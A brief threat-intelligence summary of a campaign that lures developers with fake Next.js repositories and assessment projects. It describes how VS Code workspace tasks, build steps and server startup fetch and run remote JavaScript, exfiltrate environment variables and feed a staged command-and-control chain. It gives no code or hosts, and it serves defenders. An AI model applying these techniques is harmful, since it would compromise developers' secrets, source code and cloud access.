A coordinated campaign is targeting developers through malicious repositories disguised as legitimate Next.js projects and technical assessment materials. The attack uses multiple entry points that lead to runtime retrieval and local execution of attacker-controlled JavaScript, transitioning into staged command-and-control. The campaign employs three main execution paths: Visual Studio Code workspace automation, build-time execution during application development, and server startup execution via environment variable exfiltration and dynamic remote code execution. The attack chain includes a Stage 1 C2 beacon for registration and a Stage 2 C2 controller for persistent tasking. This sophisticated approach allows attackers to blend into routine developer workflows, increasing the likelihood of code execution and potentially compromising high-value assets such as source code, environment secrets, and access to build or cloud resources.